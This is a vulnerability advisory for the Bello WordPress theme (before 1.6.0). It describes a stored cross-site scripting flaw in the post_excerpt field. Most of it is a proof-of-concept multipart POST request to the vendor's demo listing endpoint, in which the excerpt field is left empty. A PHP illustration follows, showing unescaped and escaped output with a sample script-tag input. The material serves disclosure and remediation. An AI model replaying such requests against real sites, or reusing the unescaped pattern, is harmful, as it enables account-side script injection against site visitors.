wpvulndb | M0ze | WPVDB-ID:2C274EB7-25F1-49D4-A2C8-8CE8CECEBE68
History: May 16, 2021 - 12:00 a.m.

Bello < 1.6.0 - Authenticated Cross-Site Scripting (XSS) and XFS

2021-05-16 00:00:00
m0ze
wpscan.com
8

EPSS: 0.001 (Low)

Percentile: 21.9%

The theme did not properly sanitise its post_excerpt parameter before outputting it back in the shop/my-account/bello-listing-endpoint/ page, leading to a Cross-Site Scripting issue.

PoC

– [ Payloads: ]

[$]

### – [ PoC | Authenticated XFS | My Listings: ]

[!]

POST /main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115 HTTP/1.1
Host: bello.bold-themes.com
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------16118302073611242382926219402
Content-Length: 13779
Referer: https://bello.bold-themes.com/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115
Cookie: [user cookies]

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="action"

ajax_submit
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="rwmb_form_config"

5d63602a0e2f80c83196bc5ea6405fca
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_title"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_content"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_excerpt"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_thumbnail_id"

7316
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_thumbnail_id"

7316
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="nonce_listing_cf"

e1c3b088fu
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_wp_http_referer"

/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-location_position"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-region"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_from"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_to"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_free"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_address"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_phone"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_mobile"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_email"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_website"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_price"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_description"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_facebook"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_twitter"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_instagram"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_google_plus"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_pinterest"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_tripadvisor"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_youtube"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-faq"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_free_wifi"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_air_conditioned"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_featured"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_exterior"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_interior"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_pools"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_beach"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_spa"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_sound"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_1"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_2"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_3"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_1"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[0]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[1]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[3]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[4]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[5]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-bello-listing-package"

bello-default-package
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_form_email"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_restaurant"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_non_smoking_rooms"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]"

49
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]"

115
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="rwmb_submit"

1
-----------------------------16118302073611242382926219402--
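The advisory's root cause is a stored value (post_excerpt, submitted through the listing form above) that is echoed back into the My Account page without escaping. The PHP below is an added illustration of the vulnerable pattern beside its hardened form; it is not the Bello theme's code, the function names and the sample excerpt are constructed, and the two `function_exists` shims approximate the WordPress core functions `esc_html()` and `sanitize_text_field()` so the file also runs with plain `php` outside WordPress.

```php
<?php
// Added example, not code from the Bello theme. Models the advisory's bug:
// a user-submitted post_excerpt rendered into the listing page unescaped.
// Inside WordPress the shims are skipped because the real core functions exist.

if ( ! function_exists( 'esc_html' ) ) {
    // Approximation of WordPress esc_html(): encode for an HTML text context.
    function esc_html( string $text ): string {
        return htmlspecialchars( $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}

if ( ! function_exists( 'sanitize_text_field' ) ) {
    // Approximation of WordPress sanitize_text_field(): drop all tags, trim whitespace.
    function sanitize_text_field( string $text ): string {
        return trim( strip_tags( $text ) );
    }
}

// Vulnerable pattern: the stored excerpt is concatenated straight into markup,
// so any <script> or <iframe> the submitter included runs in every viewer's browser.
function render_excerpt_unsafe( string $excerpt ): string {
    return '<p class="listing-excerpt">' . $excerpt . '</p>';
}

// Hardened output: escape at the point of output, so the excerpt is shown as text.
function render_excerpt_safe( string $excerpt ): string {
    return '<p class="listing-excerpt">' . esc_html( $excerpt ) . '</p>';
}

// Defence in depth: sanitise the submitted field before it is stored as well,
// so the database stays clean even if some template forgets to escape.
function sanitize_submitted_excerpt( array $post_data ): string {
    $raw = $post_data['post_excerpt'] ?? '';
    return sanitize_text_field( (string) $raw );
}

// Constructed sample standing in for the form field; it is not the advisory's payload.
$submitted = [ 'post_excerpt' => 'Sea view rooms <script>alert(1)</script>' ];

echo render_excerpt_unsafe( $submitted['post_excerpt'] ), PHP_EOL;
echo render_excerpt_safe( $submitted['post_excerpt'] ), PHP_EOL;
echo render_excerpt_safe( sanitize_submitted_excerpt( $submitted ) ), PHP_EOL;
```

Inside WordPress the form values arrive slashed, so a real handler would pass them through `wp_unslash()` before sanitising; the fix that matters for the advisory is the second function, escaping at output, and the third is the belt-and-braces step for the stored copy.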

CPE Name   Operator   Version
bello      lt         1.6.0
